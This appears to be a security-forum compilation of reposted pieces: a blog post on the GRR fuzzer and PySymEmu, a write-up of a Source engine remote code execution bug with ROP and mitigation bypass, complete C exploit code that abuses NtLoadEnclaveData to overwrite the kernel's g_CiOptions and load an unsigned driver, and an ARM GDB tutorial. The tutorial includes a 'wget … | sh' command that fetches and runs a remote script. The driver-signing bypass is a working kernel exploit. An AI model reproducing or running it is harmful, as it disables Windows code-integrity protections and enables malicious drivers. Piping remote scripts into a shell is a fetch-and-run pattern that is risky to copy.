During DARPA's Cyber Grand Challenge, we went web-scale and performed tens of billions of input mutations and program executions — in only 24 hours! Below are the challenges we faced when making this fuzzer, and how we solved those problems.

Throughput. Typically, program fuzzing is split into discrete steps. A sample input is given to an input "mutator" which produces input variants. In turn, each variant is separately tested against the program in the hopes that the program will crash or execute new code. GRR internalizes these steps, and while doing so, completely eliminates disk I/O and program analysis ramp-up times, which represent a significant portion of where time is spent during a fuzzing campaign with other common tools.

Transparency. Transparency requires that the program being fuzzed cannot observe or interfere with GRR. GRR achieves transparency via perfect isolation. GRR can "host" multiple 32-bit x86 processes in memory within its 64-bit address space. The instructions of each hosted process are dynamically rewritten as they execute, guaranteeing safety while maintaining operational and behavioral transparency.

Reproducibility. GRR emulates both the CPU architecture and the operating system, thereby eliminating sources of non-determinism. GRR records program executions, enabling any execution to be faithfully replayed. GRR's strong determinism and isolation guarantees let us combine the strengths of GRR with the sophistication of PSE. GRR can snapshot a running program, enabling PSE to jump-start symbolic execution from deep within a given program execution.

PySymEmu, the PhD of binary symbolic execution

Symbolic execution as a subject is hard to penetrate. Symbolic executors "reason about" every path through a program, there's a theorem prover in there somewhere, and something something… bugs fall out the other end.

At a high level, PySymEmu (PSE) is a special kind of CPU emulator: it has a software implementation for almost every hardware instruction. When PSE symbolically executes a binary, what it really does is perform all the ins-and-outs that the hardware would do if the CPU itself was executing the code.
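The paragraphs below describe how PSE turns branch conditions into constraints on symbolic input bytes. As a reference point for that discussion, here is a toy C target (a made-up example, not from PSE's test suite) whose single branch creates exactly the kind of fork described there:

#include <stdio.h>

/* With a symbolic input byte b, a symbolic executor forks at the branch:
 *   true path:  b constrained to [0, 10)
 *   false path: b constrained to [10, 256)
 * A concrete run, by contrast, follows exactly one of the two paths. */
int classify(unsigned char b)
{
    if (b < 10)
        return 1;   /* reachable iff the solver can pick b in [0, 10)   */
    return 0;       /* reachable iff the solver can pick b in [10, 256) */
}

int main(void)
{
    printf("%d\n", classify(7));   /* concrete input: takes only the true path */
    return 0;
}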
PSE explores the relationship between the life and death of programs in an unorthodox scientific experiment

CPU instructions operate on registers and memory. Registers are names for super-fast but small data storage units. Typically, registers hold four to eight bytes of data. Memory on the other hand can be huge; for a 32-bit program, up to 4 GiB of memory can be addressed. PSE's instruction simulators operate on registers and memory too, but they can do more than just store "raw" bytes — they can store expressions.

A program that consumes some input will generally do the same thing every time it executes. This happens because that "concrete" input will trigger the same conditions in the code, and cause the same loops to merry-go-round. PSE operates on symbolic input bytes: free variables that can initially take on any value. A fully symbolic input can be any input and therefore represents all inputs. As PSE emulates the CPU, if-then-else conditions impose constraints on the originally unconstrained input symbols. An if-then-else condition that asks "is input byte B less than 10" will constrain the symbol for B to be in the range [0, 10) along the true path, and to be in the range [10, 256) along the false path.

If-then-elses are like forks in the road when executing a program. At each such fork, PSE will ask its theorem prover: "if I follow the path down one of the prongs of the fork, then are there still inputs that satisfy the additional constraints imposed by that path?" PSE will follow each yay path separately, and ignore the nays.

So, what challenges did we face when creating and extending PSE?

Comprehensiveness. Arbitrary program binaries can exercise any one of thousands of the instructions available to x86 CPUs. PSE implements simulation functions for hundreds of x86 instructions. PSE falls back onto a custom, single-instruction "micro-executor" in those cases where an instruction emulation is not or cannot be provided. In practice, this setup enables PSE to comprehensively emulate the entire CPU.

Scale. Symbolic executors try to follow all feasible paths through a program by forking at every if-then-else condition, and constraining the symbols one way or another along each path. In practice, there are an exponential number of possible paths through a program. PSE handles the scalability problem by selecting the best path to execute for the given execution goal, and by distributing the program state space exploration process across multiple machines.

Memory. Symbolic execution produces expressions representing simple operations like adding two symbolic numbers together, or constraining the possible values of a symbol down one path of an if-then-else code block. PSE gracefully handles the case where addresses pointing into memory are symbolic. Memory accessed via a symbolic address can potentially point anywhere — even point to "good" and "bad" (i.e. unmapped) memory.

Extensibility. PSE is written using the Python programming language, which makes it easy to hack on. However, modifying a symbolic executor can be challenging — it can be hard to know where to make a change, and how to get the right visibility into the data that will make the change a success. PSE includes smart extension points that we've successfully used for supporting concolic execution and exploit generation.

Measuring excellence

So how do GRR and PSE compare to the best publicly available tools?
GRR

GRR is both a dynamic binary translator and fuzzer, and so it's apt to compare it to AFLPIN, a hybrid of the AFL fuzzer and Intel's PIN dynamic binary translator. During the Cyber Grand Challenge, DARPA helpfully provided a tutorial on how to use PIN with DECREE binaries. At the time, we benchmarked PIN and found that, before we even started optimizing GRR, it was already twice as fast as PIN!

The more important comparison metric is in terms of bug-finding. AFL's mutation engine is smart and effective, especially in terms of how it chooses the next input to mutate. GRR internalizes Radamsa, another too-smart mutation engine, as one of its many input mutators. Eventually we may also integrate AFL's mutators. During the qualifying event, GRR went face-to-face with AFL, which was integrated into the Driller bug-finding system. Our combination of GRR+PSE found more bugs. Beyond this one data point, a head-to-head comparison would be challenging and time-consuming.

PySymEmu

PSE can be most readily compared with KLEE, a symbolic executor of LLVM bitcode, or the angr binary analysis platform. LLVM bitcode is a far cry from x86 instructions, so it's an apples-to-oranges comparison. Luckily we have McSema, our open-source and actively maintained x86-to-LLVM bitcode translator. Our experiences with KLEE have been mostly negative; it's hard to use, hard to hack on, and it only works well on bitcode produced by the Clang compiler.

Angr uses a customized version of the Valgrind VEX intermediate representation. Using VEX enables angr to work on many different platforms and architectures. Many of the angr examples involve reverse engineering CTF challenges instead of exploitation challenges. These RE problems often require manual intervention or state knowledge to proceed. PSE is designed to try to crash the program at every possible emulated instruction. For example, PSE will use its knowledge of symbolic memory to access any possible invalid array-like memory accesses instead of just trying to solve for reaching unconstrained paths.

During the qualifying event, angr went face-to-face with GRR+PSE and we found more bugs. Since then, we have improved PSE to support user interaction, concrete and concolic execution, and taint tracking.

I'll be back!

Automating the discovery of bugs in real programs is hard. We tackled this challenge by developing two production-quality bug-finding tools: GRR and PySymEmu. GRR and PySymEmu have been a topic of discussion in recent presentations about our CRS, and we suspect that these tools may be seen again in the near future.

By Peter Goodman

Sursa: https://blog.trailofbits.com/2016/08/02/engineering-solutions-to-hard-program-analysis-problems/
  9. Remote Code Execution In Source Games

Valve's Source SDK contained a buffer overflow vulnerability which allowed remote code execution on clients and servers. The vulnerability was exploited by fragging a player, which caused a specially crafted ragdoll model to be loaded. Multiple Source games were updated during the month of June 2017 to fix the vulnerability. Titles included CS:GO, TF2, HL2:DM, Portal 2, and L4D2. We thank Valve for being very responsive and taking care of vulnerabilities swiftly. Valve patched and released updates for their more popular titles within a day.

Missing Bounds Check

The function nexttoken is used to tokenize a string. Note how the buffer str is copied into the buffer token, as long as a NULL character or the delimiter character sep is not found. No bounds checking is performed. View source on GitHub.

const char *nexttoken(char *token, const char *str, char sep)
{
    ...
    while ((*str != sep) && (*str != '\0'))
    {
        *token++ = *str++;
    }
    ...
}

The Vulnerability

The method ParseKeyValue of class CRagdollCollisionRulesParse is called when processing ragdoll model data, such as when a player is fragged. This method calls nexttoken to tokenize the rule for further processing. By supplying a collisionpair rule longer than 256 characters, the buffer szToken can be overflowed. Since szToken is stored on the stack, the return address of the ParseKeyValue method can be overwritten. View source on GitHub.

class CRagdollCollisionRulesParse : public IVPhysicsKeyHandler
{
    virtual void ParseKeyValue( void *pData, const char *pKey, const char *pValue )
    {
        ...
        else if ( !strcmpi( pKey, "collisionpair" ) )
        ...
        char szToken[256];
        const char *pStr = nexttoken(szToken, pValue, ',');
        ...
    }
}

Mitigation Bypass

Address Space Layout Randomization (ASLR) is a powerful mitigation against exploiting memory corruption vulnerabilities. The mitigation randomizes the addresses where executables are loaded into memory. This feature is opt-in, and all executables loaded into the memory of a process must have it enabled in order for it to be effective.

The DLL steamclient.dll did not have ASLR enabled. This meant the executable pages of steamclient.dll were loaded into memory at predictable addresses, which allowed existing instructions within those pages to be located and used trivially.

Collecting ROP Gadgets

Return Oriented Programming is a technique that allows shellcode to be created by re-using existing instructions in a program. Simply put, you find a chain of instructions that ends with a RETN instruction. You insert the address of the first instruction of the chain onto the stack, so when a function returns the address is popped into the Instruction Pointer register, and then the instructions execute.

Since x86 and x64 instructions do not need to be memory aligned, any address can be interpreted as an instruction. By setting the instruction pointer to the middle of an instruction, a wider range of instructions becomes available. The Immunity Debugger plugin Mona provides a utility to discover gadgets. Be aware though, the plugin doesn't find all useful gadgets, such as REP MOVS.

Launching cmd.exe

Due to the way the payload is processed, NULL characters can not be used, and upper case characters are converted to lower case characters. This means our ROP gadget addresses become limited, as does any other data used in our payload. To get around this, the shellcode is bootstrapped with a gadget chain which locates the original un-modified buffer in memory. The un-modified payload is then copied back onto the stack via a REP MOVS gadget.

The steamclient.dll executable imports LoadLibraryA and GetProcAddressA. This allows us to load other DLLs into memory, and obtain references to additional exported functions. We can import Shell32.dll to obtain a reference to the function ShellExecuteA, which can be used to launch other programs.

Proof Of Concept

In order to give third-party mod creators time to update their games, the proof of concept will be released in 30 days. Source mod developers should apply the patch below.

Delivering The Payload

The Source engine allows custom content to be packed into map files. Commonly this is used for adding extra content to maps, such as sounds or textures. By packing a ragdoll model file into a map file, with the same resource path as an original ragdoll model file, our version will be used instead.

Recommended Fix

To prevent buffer overflows from occurring, do not store more data in a buffer than it can hold. The nexttoken function should accept a token length argument which would be used to perform bounds checking. Developers who have created a Source modification game should apply the following patch.

To mitigate exploitation of memory corruption vulnerabilities, enable ASLR for all executables. Perform automated checks during the build process to ensure all executables support ASLR. This can be achieved by using the checkbins.py utility developed by the Chromium team.

Additionally, Source games should be sandboxed to restrict access to resources and to prevent new processes from being started. As an example of how effective proper sandboxing can be, kernel exploits are often used when exploiting web browser memory corruption vulnerabilities, since the userland browser process is so restricted. For additional information, refer to Chromium's sandbox implementation.

Download Patch

Final Thoughts

Video games are interesting targets for exploitation, not only technically but also logistically. As video games are common inside employee break rooms and homes of employees, exploitation of a vulnerability could be used in a targeted attack to jump the air gap to a private network. Additionally, discovering a remote code execution vulnerability in a popular video game can be used to quickly create a botnet or spread ransomware.

As a mitigation, games should not be installed on work devices. Gaming machines should be moved to an untrusted network, and business devices should not connect to the untrusted network. For those who play Source games, the attack surface can be shrunk by disabling third-party content from downloading. This can be achieved with the console commands cl_allowdownload 0 and cl_downloadfilter all.

Additionally, since the vulnerability was discovered in the Source SDK, additional third-party mods are most likely vulnerable. However, by enabling ASLR for all executable modules, a memory disclosure vulnerability is required to develop a reliable exploit.

About the author: Justin Taft is a software engineer who is adamant about secure coding practices. He has worked with many Fortune 500 companies to improve the security posture of their products. From reversing firmware of biometric fingerprint readers, to performing security reviews of cloud-based Java application deployments, he is experienced in tackling a wide range of security assessments.

Sursa: https://oneupsecurity.com/research/remote-code-execution-in-source-games?t=r
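The recommended fix above says nexttoken should accept a token length argument used for bounds checking. Below is a minimal sketch of what that could look like, assuming the tokenizer's original contract; the exact signature and return behavior of Valve's eventual patch may differ.

#include <stddef.h>

/* Copy characters from str into token until sep or NUL is reached,
 * writing at most token_len - 1 characters plus a terminating NUL.
 * Extra input is consumed but silently truncated. Illustrative only;
 * not Valve's actual patch. */
const char *nexttoken_safe(char *token, size_t token_len,
                           const char *str, char sep)
{
    size_t written = 0;

    if (token == NULL || token_len == 0 || str == NULL)
        return NULL;

    while (*str != sep && *str != '\0') {
        if (written + 1 < token_len)    /* leave room for the NUL */
            token[written++] = *str;
        str++;                          /* always consume the input */
    }
    token[written] = '\0';

    if (*str == sep)
        str++;                          /* skip the delimiter */
    return (*str != '\0') ? str : NULL;
}

The call site in ParseKeyValue would then pass sizeof(szToken), so a collisionpair rule longer than 256 characters is truncated instead of overflowing the stack.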
  10. #include "global.h" HINSTANCE g_hInstance; HANDLE g_ConOut = NULL; BOOL g_ConsoleOutput = FALSE; WCHAR g_BE = 0xFEFF; RTL_OSVERSIONINFOW g_osv; #define CI_DLL "ci.dll" #define T_PROGRAMTITLE TEXT("NtLoadEnclaveData write to address Demo") #define T_PROGRAMUNSUP TEXT("Unsupported WinNT version\r\n") #define T_PROGRAMRUN TEXT("Another instance running, close it before\r\n") #define T_PROGRAMINTRO TEXT("NtLoadEnclaveData demo started\r\n(c) 2017 Project Authors\r\nSupported x64 OS : 10 RS3\r\n") #define DUMMYDRVREG L"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\DummyDrv" NTSTATUS NativeAdjustPrivileges( _In_ ULONG Privilege ) { NTSTATUS Status; HANDLE TokenHandle; LUID Luid; TOKEN_PRIVILEGES TokenPrivileges; Luid.LowPart = Privilege; Luid.HighPart = 0; TokenPrivileges.PrivilegeCount = 1; TokenPrivileges.Privileges[0].Luid = Luid; TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; Status = NtOpenProcessToken( NtCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &TokenHandle); if (NT_SUCCESS(Status)) { Status = NtAdjustPrivilegesToken( TokenHandle, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, NULL); NtClose(TokenHandle); } if (Status == STATUS_NOT_ALL_ASSIGNED) Status = STATUS_PRIVILEGE_NOT_HELD; return Status; } NTSTATUS NativeLoadDriver( _In_ PWSTR DrvFullPath, _In_ PWSTR KeyName, _In_opt_ PWSTR DisplayName, _In_ BOOL ReloadDrv ) { UNICODE_STRING ValueName, drvName; OBJECT_ATTRIBUTES attr; HANDLE hDrvKey; ULONG data, dataSize = 0; NTSTATUS ns = STATUS_UNSUCCESSFUL; hDrvKey = NULL; __try { if (!ARGUMENT_PRESENT(KeyName)) { ns = STATUS_OBJECT_NAME_NOT_FOUND; __leave; } RtlInitUnicodeString(&drvName, KeyName); InitializeObjectAttributes(&attr, &drvName, OBJ_CASE_INSENSITIVE, 0, NULL); ns = NtCreateKey(&hDrvKey, KEY_ALL_ACCESS, &attr, 0, NULL, REG_OPTION_NON_VOLATILE, NULL); if (!NT_SUCCESS(ns)) { __leave; } if (ARGUMENT_PRESENT(DrvFullPath)) { RtlInitUnicodeString(&ValueName, L"ImagePath"); dataSize = (ULONG)(1 + _strlen(DrvFullPath)) * sizeof(WCHAR); ns = NtSetValueKey(hDrvKey, &ValueName, 0, REG_EXPAND_SZ, (PVOID)DrvFullPath, dataSize); if (!NT_SUCCESS(ns)) { __leave; } } data = 1; RtlInitUnicodeString(&ValueName, L"Type"); ns = NtSetValueKey(hDrvKey, &ValueName, 0, REG_DWORD, (PVOID)&data, sizeof(DWORD)); if (!NT_SUCCESS(ns)) { __leave; } data = 3; RtlInitUnicodeString(&ValueName, L"Start"); ns = NtSetValueKey(hDrvKey, &ValueName, 0, REG_DWORD, (PVOID)&data, sizeof(DWORD)); if (!NT_SUCCESS(ns)) { __leave; } data = SERVICE_ERROR_NORMAL; RtlInitUnicodeString(&ValueName, L"ErrorControl"); ns = NtSetValueKey(hDrvKey, &ValueName, 0, REG_DWORD, (PVOID)&data, sizeof(DWORD)); if (!NT_SUCCESS(ns)) { __leave; } if (ARGUMENT_PRESENT(DisplayName)) { RtlInitUnicodeString(&ValueName, L"DisplayName"); dataSize = (ULONG)(1 + _strlen(DisplayName)) * sizeof(WCHAR); ns = NtSetValueKey(hDrvKey, &ValueName, 0, REG_SZ, DisplayName, dataSize); if (!NT_SUCCESS(ns)) { __leave; } } NtClose(hDrvKey); hDrvKey = NULL; ns = NtLoadDriver(&drvName); if (ns == STATUS_IMAGE_ALREADY_LOADED) { if (ReloadDrv == TRUE) { NtUnloadDriver(&drvName); //unload previous driver version NtYieldExecution(); ns = NtLoadDriver(&drvName); } else { ns = STATUS_SUCCESS; } } } __finally { if (hDrvKey != NULL) { NtClose(hDrvKey); } } return ns; } LONG QueryCiOptions( _In_ PVOID MappedBase, _Inout_ ULONG_PTR *KernelBase ) { PBYTE CiInitialize = NULL; ULONG c, j = 0; LONG rel = 0; hde64s hs; CiInitialize = (PBYTE)GetProcAddress(MappedBase, "CiInitialize"); if (CiInitialize == 
NULL) return 0; if (g_osv.dwBuildNumber > 16199) { c = 0; j = 0; do { /* call CipInitialize */ if (CiInitialize[c] == 0xE8) j++; if (j > 1) { rel = *(PLONG)(CiInitialize + c + 1); break; } hde64_disasm(CiInitialize + c, &hs); if (hs.flags & F_ERROR) break; c += hs.len; } while (c < 256); } else { c = 0; do { /* jmp CipInitialize */ if (CiInitialize[c] == 0xE9) { rel = *(PLONG)(CiInitialize + c + 1); break; } hde64_disasm(CiInitialize + c, &hs); if (hs.flags & F_ERROR) break; c += hs.len; } while (c < 256); } CiInitialize = CiInitialize + c + 5 + rel; c = 0; do { if (*(PUSHORT)(CiInitialize + c) == 0x0d89) { rel = *(PLONG)(CiInitialize + c + 2); break; } hde64_disasm(CiInitialize + c, &hs); if (hs.flags & F_ERROR) break; c += hs.len; } while (c < 256); CiInitialize = CiInitialize + c + 6 + rel; *KernelBase = *KernelBase + CiInitialize - (PBYTE)MappedBase; return rel; } ULONG_PTR QueryVariableAddress( VOID ) { LONG rel = 0; ULONG_PTR Result = 0, ModuleKernelBase = 0; CHAR *szModuleName; WCHAR *wszErrorEvent, *wszSuccessEvent; PVOID MappedBase = NULL; CHAR szFullModuleName[MAX_PATH * 2]; szModuleName = CI_DLL; wszErrorEvent = TEXT("Ldr: CI.dll loaded image base not recognized"); wszSuccessEvent = TEXT("Ldr: CI.dll loaded for pattern search"); ModuleKernelBase = supGetModuleBaseByName(szModuleName); if (ModuleKernelBase == 0) { cuiPrintText(g_ConOut, wszErrorEvent, g_ConsoleOutput, TRUE); return 0; } szFullModuleName[0] = 0; if (!GetSystemDirectoryA(szFullModuleName, MAX_PATH)) return 0; _strcat_a(szFullModuleName, "\\"); _strcat_a(szFullModuleName, szModuleName); // _strcpy(szFullModuleName, "C:\\malware\\ci.dll"); MappedBase = LoadLibraryExA(szFullModuleName, NULL, DONT_RESOLVE_DLL_REFERENCES); if (MappedBase) { cuiPrintText(g_ConOut, wszSuccessEvent, g_ConsoleOutput, TRUE); rel = QueryCiOptions( MappedBase, &ModuleKernelBase); if (rel != 0) { Result = ModuleKernelBase; } FreeLibrary(MappedBase); } else { wszErrorEvent = TEXT("Ldr: Cannot load CI.dll"); cuiPrintText(g_ConOut, wszErrorEvent, g_ConsoleOutput, TRUE); } return Result; } VOID LoadDriver() { NTSTATUS Status; HANDLE Link = NULL; UNICODE_STRING str, drvname; OBJECT_ATTRIBUTES Obja; WCHAR szBuffer[MAX_PATH + 1]; Status = NativeAdjustPrivileges(SE_LOAD_DRIVER_PRIVILEGE); if (!NT_SUCCESS(Status)) { RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); _strcpy(szBuffer, TEXT("Ldr: NativeAdjustPrivileges result = 0x")); ultohex(Status, _strend(szBuffer)); cuiPrintText(g_ConOut, szBuffer, g_ConsoleOutput, TRUE); return; } _strcpy(szBuffer, L"\\??\\"); _strcat(szBuffer, NtCurrentPeb()->ProcessParameters->CurrentDirectory.DosPath.Buffer); _strcat(szBuffer, L"dummy.sys"); RtlInitUnicodeString(&str, L"\\*"); RtlInitUnicodeString(&drvname, szBuffer); InitializeObjectAttributes(&Obja, &str, OBJ_CASE_INSENSITIVE, 0, NULL); Status = NtCreateSymbolicLinkObject(&Link, SYMBOLIC_LINK_ALL_ACCESS, &Obja, &drvname); if (!NT_SUCCESS(Status)) { RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); _strcpy(szBuffer, TEXT("Ldr: NtCreateSymbolicLinkObject result = 0x")); ultohex(Status, _strend(szBuffer)); cuiPrintText(g_ConOut, szBuffer, g_ConsoleOutput, TRUE); } else { Status = NativeLoadDriver(L"\\*", DUMMYDRVREG, NULL, TRUE); RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); _strcpy(szBuffer, TEXT("Ldr: NativeLoadDriver result = 0x")); ultohex(Status, _strend(szBuffer)); cuiPrintText(g_ConOut, szBuffer, g_ConsoleOutput, TRUE); if (Link) NtClose(Link); } } typedef NTSTATUS(NTAPI *pfnNtLoadEnclaveData)( ULONG_PTR Param1, ULONG_PTR Param2, ULONG_PTR Param3, 
ULONG_PTR Param4, ULONG_PTR Param5, ULONG_PTR Param6, ULONG_PTR Param7, ULONG_PTR Param8, ULONG_PTR Param9 ); pfnNtLoadEnclaveData NtLoadEnclaveData; UINT NtLoadEnclaveDataDemo() { NTSTATUS Status = STATUS_SUCCESS; HMODULE hNtdll; ULONG_PTR g_CiOptions = 0; WCHAR *wszErrorEvent; WCHAR szBuffer[MAX_PATH]; g_CiOptions = QueryVariableAddress(); if (g_CiOptions != 0) { _strcpy(szBuffer, TEXT("Ldr: CI.dll->g_CiOptions found at 0x")); u64tohex(g_CiOptions, _strend(szBuffer)); cuiPrintText(g_ConOut, szBuffer, g_ConsoleOutput, TRUE); } else { wszErrorEvent = TEXT("Ldr: CI.dll->g_CiOptions address not found."); cuiPrintText(g_ConOut, wszErrorEvent, g_ConsoleOutput, TRUE); return 0; } hNtdll = GetModuleHandle(TEXT("ntdll.dll")); if (hNtdll) { NtLoadEnclaveData = (pfnNtLoadEnclaveData)GetProcAddress(hNtdll, "NtLoadEnclaveData"); if (NtLoadEnclaveData) { Status = NtLoadEnclaveData(0x00007FFFFFFFFFFF, 0x00007FFFFFFFFFFE, 0x00007FFFFFFEFFFE, 0x000000000000FFFF, 0x00007FFFFFFEFFFE, 0x00007FFFFFFFFFFF, 0xFFFF800000000000, 0x000000000000FFFF, g_CiOptions); RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); _strcpy(szBuffer, TEXT("Ldr: NtLoadEnclaveData returned with status = 0x")); ultohex((ULONG)Status, _strend(szBuffer)); cuiPrintText(g_ConOut, szBuffer, g_ConsoleOutput, TRUE); if (Status == STATUS_ACCESS_VIOLATION) { _strcpy(szBuffer, TEXT("Ldr: Attempt to load unsigned demo driver")); cuiPrintText(g_ConOut, szBuffer, g_ConsoleOutput, TRUE); LoadDriver(); } } else { wszErrorEvent = TEXT("Ldr: NtLoadEnclaveData procedure not found."); cuiPrintText(g_ConOut, wszErrorEvent, g_ConsoleOutput, TRUE); } } return (UINT)Status; } void DSEFixMain() { BOOL bCond = FALSE; UINT uResult = 0; DWORD dwTemp; WCHAR text[256]; __security_init_cookie(); do { g_hInstance = GetModuleHandle(NULL); g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE); if (g_ConOut == INVALID_HANDLE_VALUE) { uResult = (UINT)-1; break; } g_ConsoleOutput = TRUE; if (!GetConsoleMode(g_ConOut, &dwTemp)) { g_ConsoleOutput = FALSE; } SetConsoleTitle(T_PROGRAMTITLE); SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT); if (g_ConsoleOutput == FALSE) { WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dwTemp, NULL); } cuiPrintText(g_ConOut, T_PROGRAMINTRO, g_ConsoleOutput, TRUE); RtlSecureZeroMemory(&g_osv, sizeof(g_osv)); g_osv.dwOSVersionInfoSize = sizeof(g_osv); RtlGetVersion((PRTL_OSVERSIONINFOW)&g_osv); #ifndef _DEBUG if ((g_osv.dwBuildNumber < 16199) || (g_osv.dwBuildNumber > 16241)) { cuiPrintText(g_ConOut, T_PROGRAMUNSUP, g_ConsoleOutput, TRUE); uResult = (UINT)-1; break; } #endif _strcpy(text, TEXT("Ldr: Windows v")); ultostr(g_osv.dwMajorVersion, _strend(text)); _strcat(text, TEXT(".")); ultostr(g_osv.dwMinorVersion, _strend(text)); _strcat(text, TEXT(" build ")); ultostr(g_osv.dwBuildNumber, _strend(text)); cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); uResult = NtLoadEnclaveDataDemo(); cuiPrintText(g_ConOut, TEXT("Ldr: Exit"), g_ConsoleOutput, TRUE); } while (bCond); ExitProcess(uResult); } hfiref0x Sursa: https://gist.github.com/hfiref0x/1ac328a8e73d053012e02955d38e36a8
  11. DEBUGGING WITH GDB

This is a very brief introduction to compiling ARM binaries and basic debugging with GDB. As you follow the tutorials, you might want to follow along and experiment with ARM assembly on your own. In that case, you would either need a spare ARM device, or you can just set up your own lab environment in a VM by following the steps in this short How-To. You can use the following code from Part 7 – Stack and Functions to get familiar with basic debugging with GDB.

.section .text
.global _start

_start:
   push {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
   add r11, sp, #0   /* Setting up the bottom of the stack frame */
   sub sp, sp, #16   /* End of the prologue. Allocating some buffer on the stack */
   mov r0, #1        /* setting up local variables (a=1). This also serves as setting up the first parameter for the max function */
   mov r1, #2        /* setting up local variables (b=2). This also serves as setting up the second parameter for the max function */
   bl max            /* Calling/branching to function max */
   sub sp, r11, #0   /* Start of the epilogue. Readjusting the Stack Pointer */
   pop {r11, pc}     /* End of the epilogue. Restoring Frame pointer from the stack, jumping to previously saved LR via direct load into PC */

max:
   push {r11}        /* Start of the prologue. Saving Frame Pointer onto the stack */
   add r11, sp, #0   /* Setting up the bottom of the stack frame */
   sub sp, sp, #12   /* End of the prologue. Allocating some buffer on the stack */
   cmp r0, r1        /* Implementation of if(a<b) */
   movlt r0, r1      /* if r0 was lower than r1, store r1 into r0 */
   add sp, r11, #0   /* Start of the epilogue. Readjusting the Stack Pointer */
   pop {r11}         /* restoring frame pointer */
   bx lr             /* End of the epilogue. Jumping back to main via LR register */

Using GDB Enhanced Features (GEF) with GDB is highly recommended:

root@labs:~# wget -q -O- https://github.com/hugsy/gef/raw/master/gef.sh | sh

Save the code above in a file called max.s and compile it with the following commands:

$ as max.s -o max.o
$ ld max.o -o max

The debugger is a powerful tool that can:

Load a memory dump after a crash (post-mortem debugging)
Attach to a running process (used for server processes)
Launch a program and debug it

Launch GDB against either a binary, a core file, or a Process ID:

Attach to a process: $ gdb -pid $(pidof <process>)
Debug a binary: $ gdb ./file
Inspect a core (crash) file: $ gdb -c ./core.3243

$ gdb max

If you installed GEF, it drops you into the gef> prompt.
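Before moving on to the GDB commands, it can help to keep in mind what max.s computes. The ARM listing above is hand-written, but it corresponds to this small C function (a reference sketch, not part of the original tutorial):

/* C equivalent of max.s: _start sets up a = 1, b = 2 and calls max,
 * which returns the larger of the two values in r0. */
int max(int a, int b)
{
    if (a < b)      /* cmp r0, r1 / movlt r0, r1 */
        a = b;
    return a;       /* result is left in r0 */
}

int main(void)
{
    return max(1, 2);   /* mov r0, #1 / mov r1, #2 / bl max */
}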
This is how you get help:

(gdb) h
(gdb) apropos <search-term>

gef> apropos registers
collect -- Specify one or more data items to be collected at a tracepoint
core-file -- Use FILE as core dump for examining memory and registers
info all-registers -- List of all registers and their contents
info r -- List of integer registers and their contents
info registers -- List of integer registers and their contents
maintenance print cooked-registers -- Print the internal register configuration including cooked values
maintenance print raw-registers -- Print the internal register configuration including raw values
maintenance print registers -- Print the internal register configuration
maintenance print remote-registers -- Print the internal register configuration including each register's
p -- Print value of expression EXP
print -- Print value of expression EXP
registers -- Display full details on one
set may-write-registers -- Set permission to write into registers
set observer -- Set whether gdb controls the inferior in observer mode
show may-write-registers -- Show permission to write into registers
show observer -- Show whether gdb controls the inferior in observer mode
tui reg float -- Display only floating point registers
tui reg general -- Display only general registers
tui reg system -- Display only system registers

Breakpoint commands:

break (or just b) <function-name>
break <line-number>
break filename:function
break filename:line-number
break *<address>
break +<offset>
break –<offset>
tbreak (set a temporary breakpoint)
del <number> (delete breakpoint number x)
delete (delete all breakpoints)
delete <range> (delete breakpoint ranges)
disable/enable <breakpoint-number-or-range> (does not delete breakpoints, just enables/disables them)
continue (or just c) – (continue executing until next breakpoint)
continue <number> (continue but ignore current breakpoint number times. Useful for breakpoints within a loop.)
finish (continue to end of function)

gef> break _start
gef> info break
Num     Type           Disp Enb Address    What
1       breakpoint     keep y   0x00008054 <_start>
        breakpoint already hit 1 time
gef> del 1
gef> break *0x0000805c
Breakpoint 2 at 0x805c
gef> break _start

This deletes the first breakpoint and sets a breakpoint at the specified memory address. When you run the program, it will break at this exact location. If you had not deleted the first breakpoint and just set a new one and run, it would break at the first breakpoint.

Start and Stop:

Start program execution from the beginning of the program:
run
r
run <command-line-argument>

Stop program execution:
kill

Exit the GDB debugger:
quit
q

gef> run

Now that our program broke exactly where we wanted, it's time to examine the memory. The command "x" displays memory contents in various formats.
Syntax: x/<count><format><unit>

FORMAT:
x – hexadecimal
d – decimal
i – instructions
t – binary (two)
o – octal
u – unsigned
s – string
c – character

UNIT:
b – bytes
h – half words (2 bytes)
w – words (4 bytes)
g – giant words (8 bytes)

gef> x/10i $pc
=> 0x8054 <_start>:    push {r11, lr}
   0x8058 <_start+4>:  add r11, sp, #0
   0x805c <_start+8>:  sub sp, sp, #16
   0x8060 <_start+12>: mov r0, #1
   0x8064 <_start+16>: mov r1, #2
   0x8068 <_start+20>: bl 0x8074 <max>
   0x806c <_start+24>: sub sp, r11, #0
   0x8070 <_start+28>: pop {r11, pc}
   0x8074 <max>:       push {r11}
   0x8078 <max+4>:     add r11, sp, #0

gef> x/16xw $pc
0x8068 <_start+20>: 0xeb000001 0xe24bd000 0xe8bd8800 0xe92d0800
0x8078 <max+4>:     0xe28db000 0xe24dd00c 0xe1500001 0xb1a00001
0x8088 <max+20>:    0xe28bd000 0xe8bd0800 0xe12fff1e 0x00001741
0x8098:             0x61656100 0x01006962 0x0000000d 0x01080206

Commands for stepping through the code:

Step to next line of code. Will step into a function:
stepi
s
step <number-of-steps-to-perform>

Execute next line of code. Will not enter functions:
nexti
n
next <number>

Continue processing until you reach a specified line number, function name, address, filename:function, or filename:line-number:
until
until <line-number>

Show current line number and which function you are in:
where

gef> nexti 5
...
0x8068 <_start+20> bl 0x8074 <max> <- $pc
0x806c <_start+24> sub sp, r11, #0
0x8070 <_start+28> pop {r11, pc}
0x8074 <max>       push {r11}
0x8078 <max+4>     add r11, sp, #0
0x807c <max+8>     sub sp, sp, #12
0x8080 <max+12>    cmp r0, r1
